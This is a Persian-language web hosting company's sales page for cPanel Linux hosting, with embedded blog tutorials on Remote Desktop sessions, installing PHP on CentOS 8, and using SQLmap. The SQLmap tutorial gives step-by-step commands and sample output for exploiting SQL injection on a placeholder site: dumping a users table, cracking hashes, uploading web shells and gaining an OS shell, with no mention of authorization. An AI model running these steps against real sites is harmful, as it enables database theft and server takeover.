هاست

هاست

امروزه با توجه به گسترش اینترنت و فضای مجازی در جوامع ایجاد بستر مناسب جهت رفع نیازهای آنها امری ضروری است. از این رو هرچه بستر و زیرساخت قدرتمندتری نسبت به رقبای خود داشته باشید از سود بیشتری در این بازار بهره خواهید برد. به بررسی مواردی که باید برای خرید هاست توجه کنید می پردازیم.


راهنمای خرید هاست:

اولین موردی که به هنگام انتخاب هاست باید آن را مشخص کنید نوع سیستم عامل سرور میزبانی است. شاید برایتان سوال شود دانستن سرور میزبانی چه کمکی به من خواهد کرد؟

اگر سیستم مدیریت محتوای وب‌سایت شما با زبان برنامه‌نویسی php کدنویسی شده باشد باید حتماً از هاست لینوکس به عنوان میزبان سایت خودتان استفاده کنید. اگر هم سایت شما به صورت اختصاصی با زبان برنامه‌نویسی تحت ویندوز همچون asp و یا aspx  کدزنی شده باشد باید حتماً از هاست ویندوزی استفاده نمایید.

هاستینگ وان سرور با ارائه هاست لینوکس آماده میزبانی از وب سایت های شما عزیزان می باشد.

نوع کنترل پنل

معمولاً اکثر شرکت‌های هاستینگ ایرانی از دو نوع کنترل پنل دایرکت ادمین و سی پنل به عنوان کنترل پنل های میزبانی استفاده می‌کنند شما می‌توانید بر اساس نیاز و راحتی کار با آن‌ها یکی را انتخاب نمایید. تفاوت محسوسی در این کنترل پنل از نظر عملکرد وجود ندارد و تنها فرق آن‌ها در کاربرپسند بودن آن‌هاست، معمولاً بیشتر کاربران تمایل دارند تا از هاست Cpanel به عنوان پنل مدیریت سایت خودشان استفاده کنند.

نوع کنترل پنل مورد استفاده در هاستینگ وان سرور، Cpanel بوده و شما عزیزان با خرید هاست Cpanel از امکانات ویژه ای برخوردار می شوید.

 آپتایم سرویس‌ها

شاید بتوان به جرات گفت مهم‌ترین فاکتور راهنمای خرید هاست بحث آپتایم سرور است. اگر سرور میزبانی شما به هر دلیلی مرتباً قطع شود باید منتظر این باشید که بازدیدکنندگان، مشتریان و حتی رتبه سایت شما با افت شدیدی روبرو شود.

هاستینگ وان سرور با بهره گیری از سرورهای قدرتمند و با کیفیت دارای آپتایم 99.99% می باشد.

 وب سرور

وب سرور خط مقدم پاسخ‌دهی به درخواست کاربرانی است که از سایت شما بازدید می‌کنند. پرسرعت‌ترین وب سرور میزبانی لایت اسپید است.

وان سرور با استفاده از سیستم عامل کلود لینوکس و وب سرور لایت اسپید بهترین سرعت و کیفیت را به شما هدیه میکند.

نوع هارد

هارد تأثیر بسزایی در سرعت سرور دارد. هاردهای نسل جدید از جمله SSD و NVMe با قابلیت عملکرد بسیار بهتر نسبت به همتایان قدیمی خود از جمله هاردهای SATA سرعت لود سایت شما را در حد چشمگیری افزایش خواهند داد.

مزایای هاستینگ وان سرور:

  • ارائه هاست لینوکس با کیفیت
  • استفاده از کنترل پنل Cpanel و ارائه هاست Cpanel با امنیت بالا
  • بهرمندی از سرور های پرقدرت و با کیفیت و آپتایم 99.99%
  • استفاده از سیستم عامل کلود لینوکس و وب سرور لایت اسپید
  • استفاده از هارد های SATA 3 در هاست های ارزان و هارد NVMe در هاست های حرفه ای و شرکتی
  • پشتیبانی حرفه ای و 24 ساعته
  • ارائه هاست و دامنه رایگان در پلن های مشخص شده


پلن های هاست وان سرور

پشتیبانی 24/7

وان سرور با تیمی قدرتمند پشتیبانی 24 ساعته در هفت روز هفته را برای کاربران گرامی وان سرور تدارک دیده تا در هر زمان افتخار خدمت رسانی داشته باشد. پشتیبانی از طریق تیکت و تماس.

آپتایم 99.99%

سرورهای وان سرور از معتبرترین دیتاسنترهای جهان که دارای تضمین آپ تایم 99.99% میباشند، تیم وان سرور به صورت 24 ساعته در حال مانیتورینگ سرورها هستند تا در صورت وجود هرگونه اختلال و مشکل سریعا پیگیر حل مشکل باشند.

بک آپ گیری خودکار

با بک آپ گیری خودکار هاستینگ وان سرور، دیگر نگران بک آپ سایتتون نباشید، آرشیو های بک آپ به راحتی در کنترل پنلتان قابل دانلود و بازیابی میباشد

هارد NVMe

پرسرعت ترین هارد تا لحظه حال از نوع ssd Nvme میباشد که با اختلاف زیادی از رقبای نوع دیگر هاردها انتقال دیتا دارد، انتقال دیتا با سرعت تقریبا 8GB/s تجربه کاربری بهتری را در مجازی ها به نمایش میگذارد.

ترافیک نامحدود

ترافیک این نوع سرور از وان سرور به صورت نامحدود بوده و هیچ محدودیت ترافیک و پهنای باندی اعمال نشده.

وب سرور LiteSpeed

استفاده از وب سرور قدرتمند لایت اسپید (LiteSpeed) امکان پردازش سریعتر با امکانات بیشتر از جمله قابلیت کش لایت اسپید را برای شما فراهم میکند.

برخی از سیستم عامل های قابل پشتیبانی

سوالات متداول

برخی از سوالاتی که ممکن است در ابتدا داشته باشید

ثبت سفارشات هاست در وان سرور آنی است. به محض پرداخت مشخصات برای شما ایمیل خواهد شد.

بله! در صورتی که هاست شما با کنترل پنل cpanel بوده به صورت رایگان از سمت تیم وان سرور امکان انتقال وجود دارد. به این منظور از طریق پنل کاربری  بخش ارسال تیکت پشتیبانی اقدام به ارسال تیکت کنید تا همکاران بررسی و انتقال هاستتون رو انجام بدن.

این هارد بیش از ۲۰ برابر سریعتر از هاردهای Sata3 و درعمل بیش از ۵برابر سریعتر از هاردهای SSD میباشد.به همین دلیل که ارتباط هاستینگ با هارد کاملا مستقیم است این حجم تبادلات در هارد NVMe بسیار بالاتر رفته که باعث کاهش شدید تاخیر زمانی پاسخ ( Load Avg ) شده.

ارتقا در هر زمان تاریخ سررسید با وجود منابع سخت افزاری مقدور است، تنزل سرویس نیز فقط در زمان تمدید سرویس میسر خواهد بود.

بله، این قابلیت در تمامی هاستهای وان سرور مقدور است. همچنین اگر نیاز به ssl اختصاصی داشتید هم از ( بخش فروش ssl سایت ) میتوانید سفارش ثبت کنید.

بک آپ گیری ها به صورت خودکار از طریق JetBackup گرفته میشود که به دو شیوه هفتگی و هر روز میباشد.
بک آپ های روزانه: بک آپ فقط از دیتابیس های هاستتون گرفته شده و تا سه روز قبل نگهداری میشود.
بک آپ های هفتگی: بک آپ به صورت کامل فول بک آپ گرفته شده و تا دو هفته قبل موجود میباشد.
همچنین دسترسی به دانلود و ریستور بک آپ ها در سی پنل بخش jetbackup برای کاربران گرامی وان سرور محیا میباشد تا بدون اتلاف زمان اقدام به دانلود و ریستور کنند.

اگر جواب سوالتان را نیافتید، میتوانید از لینک زیر در بخش تماس با ما از طریق پلهای ارتباطی با ما در ارتباط باشید.

صفحه تماس بـــا مـــا

نظرات مشتریان

برخی از نظرات مشتریان وان سرور

جزیره آموزشی

برخی از پستهای آموزشی پیشنهادی
افزایش تعداد یوزرهای همزمان در remote Desktop windows

افزایش تعداد یوزرهای همزمان در remote Desktop windows

افزایش تعداد یوزرهای همزمان در remote Desktop windowsدر این آموزش قصد داریم تا تعداد یوزرهای همزمان آنلاین یک یوزر در ریموت دسکتاپ ویندوز 2003 و 2008 رو بهتون آموزش بدیم، این آموزش از دو طریق ریجستری و تنظیمات Administrative Tools میباشد.برای دیدن آموزش به ادامه مطلب مراجعه کنید:آموزش از طریق ریجستری:1 – ابتدا run را بازکنید و سپس دستور gpedit.msc را در آن وارد کنید.2 – سپس به مسیر زیر بروید :در ویندوز سرور 2008 :Computer Configuration\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Connections\در ویندوز سرور 2003 :Computer Configuration\Administrative Templates\Windows Components\Terminal Services\3 – حال برای افزایش تعداد connection ها به مقدار دلخواه :در ویندوز سرور 2008 Restrict each user to a single session را انتخاب کنید و مقدار دلخواه خود را وارد کنید .در ویندوز سرور 2003 Restrict Terminal Services users to a single remote session را انتخاب کرده و تعداد connection های مورد نظر خود را وارد کنید.برای اعمال تغییرات سرور خود را restart کنید. آموزش از طریق Administrative Tools ویندوز:در ویندوز 2003 مراحل زیر را طی و مقدار دیفالت 2 را به مقدار نیاز خودتان تغییر دهید:In windows Server 2003: Administrative Tools -> Terminal Service Configuration-> Connections -> Right click on RDP-tcp -> Select Properties -> Network Adapters Tab -> Maximum Connectionsدر ویندوز 2008:In Windows Server 2008: Administrative Tolls -> Remote Desktop Service -> Remote Desktop Session Host Configuration-> Connections -> Right click on RDP-tcp -> Select Properties -> Network Adapters Tab -> Maximum Connections===میتونید برای تغییر به پورت 5566 از این ریجستر استفاده کنید: RD.reg فقط کافی هست فایل رو در ویندوز سرور دانلود و سپس ران کنید و به پیام ها پاسخ مثبت بدید سپس سرور را ریبوت بدید و پس از بالا آمدن با پورت 5566 به روش ip:5566 به سرور ریموت بشید.امیدوارم مفید واقع باشهوان سرور، میزبانی سرورهای اختصاصی، مجازی. وب و دامین

شنبه, 29 فروردین 1394

ادامه مطلب
SQLmap چیست و آموزش استفاده از SQLmap

SQLmap چیست و آموزش استفاده از SQLmap

SQLmap چیست؟Sqlmap یکی از مشهورترین و قوی ترین ابزار خودکار sql injection ای هست که در بحث امنیت وجود دارد . با وجود یک آدرس اینترنتی آلوده sqlmap میتواند از پایگاه داده آن به طرق مختلف بهره برداری و سوء استفاده کند و بسیاری از هکینگ های مختلف نظیر خارج کردن نام ها و جداول و ستون ها و همچنین تمامی اطلاعات درون جداول را انجام دهد! در این آموزش آموزش استفاده از sqlmap برای بهره برداری از نرم افزار های تحت وب آسیب پذیر و همچنین تمامی کار هایی که با این نرم افزار میتوان انجام داد را بررسی میکنیم .این بزار حتی میتواند در شرایطی خاص فایل ها را به صورت ریموت و یا از راه دور  بخواند و بنویسد همچنین توسط زبان برنامه نویسی پایتون نوشته شده است . این ابزار یکی از قویترین ابزار هکینگ موجود است . sqlmap قابل استفاده برای sql injection است .Sqlmap در ابزار های تست نسخه هایی از لینوکس مانند کالی لینوکس و بک ترک و بک باکس و... گنجانده شده است . در نسخه های دیگر میتوان به سادگی از لینک زیر آن را نصب کردhttp://sqlmap.org/از آنجا که این برنامه با پایتون نوشته شده است . ابتدا ما باید بر روی سیستم مان پایتون را نصب کنیم .برای درک بهتر این این آموزش ما باید دانش نسبی ای درباره چگونگی پایگاه های داده ای که با نرم افزار های تحت وب کار می کنند داشته باشیم . برای مثال آنهایی که با php و mysql ساخته شده اند.آدرس های آسیب پذیر :خب فرض کنیم که یک نرم افزار تحت وب یا وبسایت آدرس اینترنتی ای مانند آدرس زیر دارد :http://www.site.com/section.php?id=51و این آدرس مستعد sql injection است زیرا برنامه نویس این سایت به درستی از پارامتر id استفاده نکرده است. این کار را می توان با تلاش برای باز کردن آدرس اینترنتی به راحتی آزمایش کرد. 'http://www.site.com/section.php?id=51ما فقط یک نقل قول (') را به پارامتر اضافه کردیم . اگر این آدرس به شیوه ای غیره منتظره واکنشی نشان دهد سپس واضح است که این واکنش غیر منتظره به نقل قول به معنی آن است که به راحتی نمیتواند عبور کند . بنابراین در این نمونه پارامتر id در برابر sql injection آسیب پذیر است .آموزش استفاده از sqlmapالان زمان این رسیده است که برای هک کردن چنین آدرس هایی به سراغ sqlmap برویم . sqlmap توسط ترمینال همراه با مترجم پایتون اجرا میشود .1-اسکن کردن سیستم به صورت ریموتاولین دستوری که سیستم را به صورت ریموت از لحاظ آسیب پذیری sql injection بررسی کرده و در باره آن اطلاعاتی جمع آوری میکند، دستو زیر است:$ python sqlmap.py -u "http://www.site.com/section.php?id=51"در بالا اولین و مهمترین دستور برای اجرا در برنامه sqlmap ذکر شده است. این دستور پارامتر های درونی را برای این که به sql injection آسیب پذیر هستند یا نه چک میکند . برای این sqlmap  انواع مختلفی از نمونه های پیلود های sql injection را به پارامتر ورودی ارسال کرده و در نهایت خروجی را بررسی میکند .در این فرایند sqlmap همچنین قادر است تا به صورت ریموت سیستم عامل سیستم، نام دیتابیس و نسخه آن را شناسایی کند . در اینجا نمونه ای از خروجی فرضی را می توان مشاهده نمود .[*] starting at 12:10:33[12:10:33] [INFO] resuming back-end DBMS 'mysql'[12:10:34] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[12:10:37] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5خب ابزار sqlmap سیستم عامل، وب سرور و دیتابیس را به همراه نسخه آن کشف کرده است. هرچند این مسئله هم خیلی چشمگیر و موثر است اما زمان این است که شروع کنیم تا توانایی های بیشتر این ابزار را ببینیم .2- کشف کردن پایگاه های داده :زمانی که sqlmap تایید کرد که آدرس اینترنتی در برابر sql injection آسیب پذیر است، قدم بعدی پیدا کردن نام های دیتابیس (پایگاه داده) از طریق ریموت سیستم قابل استفاده است .  گزینه  "—dbs" برای به دست آوردن لیست پایگاه داده استفاده می شود .$ python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbsخروجی می تواند یه چیزی شبیه به مثال زیر باشد :[*] starting at 12:12:56[12:12:56] [INFO] resuming back-end DBMS 'mysql'[12:12:57] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[12:13:00] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5[12:13:00] [INFO] fetching database names[12:13:00] [INFO] the SQL query used returns 2 entries[12:13:00] [INFO] resumed: information_schema[12:13:00] [INFO] resumed: safecosmeticsavailable databases [2]:[*] information_schema[*] safecosmeticsخروجی نام پایگاه های داده موجود را بر روی ریموت سیستم نشان می دهد .3- پیدا کردن جداول در پایگاه داده خاصالان وقت آن رسیده است که جداول موجود در یک دیتابیس خاص راپیدا کنیم . خب ما در نظر میگیریم دیتابیس مورد علاقه ما در اینجا  'safecosmetics' است .دستور :$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmeticsو خروجی میتواند یه چیزی شبیه به این باشد :[11:55:18] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5[11:55:18] [INFO] fetching tables for database: 'safecosmetics'[11:55:19] [INFO] heuristics detected web page charset 'ascii'[11:55:19] [INFO] the SQL query used returns 216 entries[11:55:20] [INFO] retrieved: acl_acl[11:55:21] [INFO] retrieved: acl_acl_sections........... more tablesحال با هم ستون های یک جدول خاص را پیدا می کنیم :4-پیدا کردن ستون های خاص یک جدول :حال که ما لیست جداول را داریم . ایده خوبیست که ستون های بعضی از جداول خاص را به دست بیاوریم . بیایید فرض کنیم جدول "users" است و این شامل نام کاربر و پسورد است .$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T usersخروجی یه چیزی شبیه به زیر است :[12:17:39] [INFO] the back-end DBMS is MySQLweb server operating system: FreeBSDweb application technology: Apache 2.2.22back-end DBMS: MySQL 5[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'[12:17:41] [INFO] heuristics detected web page charset 'ascii'[12:17:41] [INFO] the SQL query used returns 8 entries[12:17:42] [INFO] retrieved: id[12:17:43] [INFO] retrieved: int(11)[12:17:45] [INFO] retrieved: name[12:17:46] [INFO] retrieved: text[12:17:47] [INFO] retrieved: password[12:17:48] [INFO] retrieved: text.......[12:17:59] [INFO] retrieved: hash[12:18:01] [INFO] retrieved: varchar(128)Database: safecosmeticsTable: users[8 columns]+-------------------+--------------+| Column | Type |+-------------------+--------------+| email | text || hash | varchar(128) || id | int(11) || name | text || password | text || permission | tinyint(4) || system_allow_only | text || system_home | text |+-------------------+--------------+خب ستون ها به وضوح قابل رویت هستند .5- به دست آوردن داده از یک جدولاکنون به جالب ترین بخش رسیدیم . استخراج داده (اطلاعات) از جدول . دستور مطابق زیر است :$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T usersدستور بالا به سادگی داده (دیتا) را از جدول خاص بیرون میکشد خیلی شبیه به دستور mysqldump است .خروجی چیزی شبیه به زیر است :+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+| id | hash | name | email | password | permission | system_home | system_allow_only |+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+| 1 | 5DIpzzDHFOwnCvPonu | admin | <blank> | <blank> | 3 | <blank> | <blank> |+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+به نظر میرسد که ستون hash حاوی پسورد به صورت رمز نگاری است . سعی کنید تا هش را کرک کرده و سپس مسقیما ورود پیدا کنید . sqlmap یک فایل با پسوند csv از دیتای خروجی می سازد تا به راحتی مورد بررسی قرار بگیرد .خب تا اینجا ما به کمک sqlmap توانستیم اطلاعات زیادی را به صورت ریموت از دیتابیس یا پایگاه داده جمع آوری کنیم . مانند این است که کاربر دسترسی مستقیم به دیتابیس از طریق phpmyadmin داشته باشد. در سناریوی واقعی هکر باید تلاش بیشتری کند تا دسترسی بالاتری به سیستم داشته باشد . برای این آنها باید تلاش کنند تا پسورد رمزنگاری شده را دکیریپت یا رمزشکنی کنند و تلاش کنند تا به پنل ادمین یا مدیر لاگین (ورود) کنند . یا آنها سعی کنند با استفاده از sqlmap  به سیستم عامل دسترسی پیدا کنند .قدم بعدی چیست ؟هنگامی که ما قادر هستیم اسکن کرده یا از سیستم آسیب پذیر اطلاعات جمع آوری کنیم زمان آن فرا رسیده است که از آن بهره برداری کنیم و ببینیم که امکان آن وجود دارد که به آن سیستم دسترسی داشته باشیم . sqlmap قادر است که کار های کوچکی مانند اجرای کوئری های sql را بر روی ریموت سیستم انجام داده یا بر روی سیستم یک ریموت شل راه اندازی کند .اجرای کوئری های sql به صورت دلخواه :احتمالا ساده ترین کاری که میتوان بر روی سرور انجام داد این است که حمله از طریق sql injection باشد . پارامتر کوئری (نمایش) –sql  میتواند برای اجرای یک کوئری خاص استفاده شود .نکته ی شگفت انگیز ماجرا این است که قادر خواهیم بود یک کاربر یا یوزر را در جدول کاربران ایجاد کنیم یا کار هایی از این قبیل یا شاید محتوای صفحه مدریت محتوا (cms) را تغییر بدهیم .وارد صفحه ی پنل مدیریت شده و شروع کنید :اگر وبسایت مورد نظر توسط یک سری از cms های خاص یا در کل صفحه ی پنل مدیریت دار اجرایی مشود پس از طریق صفحه ی ارائه شده برای بازیابی پسورد با بازیابی یا کرک پسورد در دیتابیس ممکن است بتوان وارد شد . پسورد های ساده یا کوتاه را میتوان با برت فورس شکست یا از گوگل کمک گرفت .چک کنید که صفحه ی مدیریت اجازه میدهد تا چند فایل را آپلود کنید. اگر یک فایل php دلخواه را بشود آپلود کرد قضیه خیلی جالب تر خواهد بود . فایل php می تواند یک شل یا سیستم کنترل از راه دوری باشد که بتوان به صورت ریموت دستورات را اجرا کرد . و یا میتوان وب شل هایی رو آپلود کرد تا مستقیما همین کار را انجام داد .شل های از راه دور :این کاری است که برای به دست گرفتن کل سیستم میتوان انجام داد . با این حال توجه داشته باشید که مانند کار هایی که بالا نشان داده شد آسان نیست .sqlmap میتواند با با پارامتری که به آن  --os-shel گفته میشود برای به دست گرفتن یک شل در ریموت سیستم استفاده شود . اما این قضیه به طور زیادی با محدودیت همراه است .با توجه به راهنمای sqlmap :It is possible to run arbitrary commands on the database server's underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.مهمترین امتیاز مورد نیاز در کاربر دیتابیس موجود نوشتن یا برگذاری فایل ها در درون کارکرد های پایگاه داده یا دیتابیس است . که این مورد در اکثر موارد غایب است و در حالت تکنیکی در بیشتر مواقع کار نخواهد کرد .توجه داشته باشید :بعضی مواقع sqlmap در کل نمیتواند به آدرس مورد نظر وصل شود .این مورد زمانی مشاهده می شود که در اولین اتصال گیر کند و پیام " آزمایش ارتباط اتصال با آدرس هدف" را بدهد . در این موارد استفاده از گزینه ی "—random-agent" کارامد خواهد بود . این باعث می شود که sqlmap با اثر یکی از نماینده کاربر معتبری همچون مرورگر کروم یا فایر فاکس ارسال کند .  برای آدرس هایی که در پارامتر معتبری نیستند sqlmap نمیداند که Inject را از چه طریقی انجام بدهد . برای مثال آدرس هایی مانند  :http://www.site.com/class_name/method/43/80در این موارد نیاز داریم تا با استفده از * اینجکشن را مشخص کنیمhttp://www.site.com/class_name/method/43*/80در بالا به sqlmap میگوییم که نقطه مورد نظر ما با * مشخص شده است .نتیجه گیریدر این آموزش با sqlmap و برخی استفاده های آن آشنا شدیم. در آموزش بعد نحوه استفاده از sqlmap برای فرم ها را شرح خواهیم داد.

چهارشنبه, 05 شهریور 1399

ادامه مطلب
آموزش نصب PHP در CentOS 8

آموزش نصب PHP در CentOS 8

آموزش نصب PHP در CentOS 8PHP یکی از پرکاربردترین زبانهای برنامه نویسی سمت سرور است. بسیاری از CMS ها و فریم ورک های معروف مانند WordPress ، Magento و Laravel در PHP ساخته شده اند. در این آموزش نحوه نصب PHP در CentOS 8 را توضیح خواهیم داد.ما در مورد نحوه نصب PHP 7.2 ، 7.3 یا 7.4 در CentOS 8 صحبت خواهیم کرد. قبل از انتخاب نسخه PHP برای نصب ، مطمئن شوید که برنامه های شما از آن پشتیبانی می کنند. ما همچنین نحوه ادغام PHP با Nginx و Apache را به شما نشان خواهیم داد.نصب PHP در CentOS 8CentOS 8 با PHP 7.2 توزیع می شود. این نسخه از اکثر برنامه های کاربردی مدرن PHP پشتیبانی می کند ، اما از نوامبر 2019 دیگر به طور فعال نگهداری نمی شود. نسخه های جدیدتر PHP از مخزن Remi در دسترس هستند. مخزن Remi را فعال کنید اگر می خواهید PHP نسخه 7.2 distro پایدار را نصب کنید ، از این مرحله پرش کنید. در غیر این صورت ، اگر می خواهید PHP 7.3 یا 7.4 را نصب کنید ، با اجرای دستور زیر به عنوان root یا کاربر دارای امتیازات sudo ، مخزن Remi را فعال کنید: sudo dnf install dnf-utils http://rpms.remirepo.net/enterprise/remi-release-8.rpm دستور فوق مخزن EPEL را نیز فعال می کند. پس از اتمام نصب ، دستور زیر را اجرا کنید تا لیستی از تمام نسخه های PHP موجود را بدست آورید: sudo dnf module list phpخروجی لیستی از تمام ماژول های موجود ، از جمله جریان ، نسخه و پروفایل های مربوطه را نشان می دهد.Last metadata expiration check: 0:02:11 ago on Fri 18 Oct 2019 08:31:43 PM UTC.CentOS-8 - AppStreamName Stream Profiles Summary php 7.2 [d][e] common [d], devel, minimal PHP scripting language Remi's Modular repository for Enterprise Linux 8 - x86_64Name Stream Profiles Summary php remi-7.2 common [d], devel, minimal PHP scripting language php remi-7.3 common [d], devel, minimal PHP scripting language php remi-7.4 common [d], devel, minimal PHP scripting language Hint: [d]efault, [e]nabled, [x]disabled, [i]nstalledماژول پیش فرض PHP بر روی PHP 7.2 تنظیم شده است. برای نصب نسخه PHP جدیدتر ، نسخه مناسب را فعال کنید: PHP 7.3 sudo dnf module reset php sudo dnf module enable php:remi-7.3 PHP 7.4 sudo dnf module reset phpsudo dnf module enable php:remi-7.4 اکنون آماده نصب PHP در سرور CentOS خود هستید.پی اچ پی را نصب کنید دستور زیر PHP و بعضی از متداول ترین PHP ها را نصب می کند: sudo dnf install php php-opcache php-gd php-curl php-mysqlndPHP با استفاده از FPM به عنوان یک وابستگی نصب شده و به عنوان سرور FastCGI استفاده می شود. سرویس FPM را استارت کنید و آن را فعال کنید تا بطور خودکار بعد از بوت فعال شود: sudo systemctl enable --now php-fpmپیکربندی PHP برای کار با Apache اگر از Apache به عنوان وب سرور خود استفاده می کنید ، سرویس httpd را با استفاده از دستور زیر مجدداً راه اندازی کنید: sudo systemctl restart httpdپیکربندی PHP برای کار با Nginx به طور پیش فرض ، PHP FPM به صورت apache کاربر اجرا می شود. برای جلوگیری از مشکلات مجوز ، کاربر را به nginx تغییر می دهیم. برای انجام این کار ، خطوط برجسته شده به رنگ زرد را ویرایش کنید: ...user = nginx...group = nginxsudo nano /etc/php-fpm.d/www.conf اطمینان حاصل کنید که فهرست /var/lib/php دارای مالکیت صحیح است: chown -R root:nginx /var/lib/phpپس از اتمام ، سرویس PHP FPM را مجدداً راه اندازی کنید: sudo systemctl restart php-fpmدر مرحله بعد ، دستورالعمل میزبان مجازی Nginx را ویرایش کنید و بلوک موقعیت مکانی زیر را اضافه کنید تا Nginx بتواند فایلهای PHP را پردازش کند:server { # . . . other code location ~ \.php$ { try_files $uri =404; fastcgi_pass unix:/run/php-fpm/www.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; }}برای پیکربندی جدید ، سرویس Nginx را مجدداً راه اندازی کنید: sudo systemctl restart nginx نتیجه PHP 7.2 برای نصب از مخازن پیش فرض CentOS 8 در دسترس است. اگر می خواهید نسخه جدیدتری را نصب کنید ، باید مخزن Remi را فعال کنید.

شنبه, 27 مهر 1398

ادامه مطلب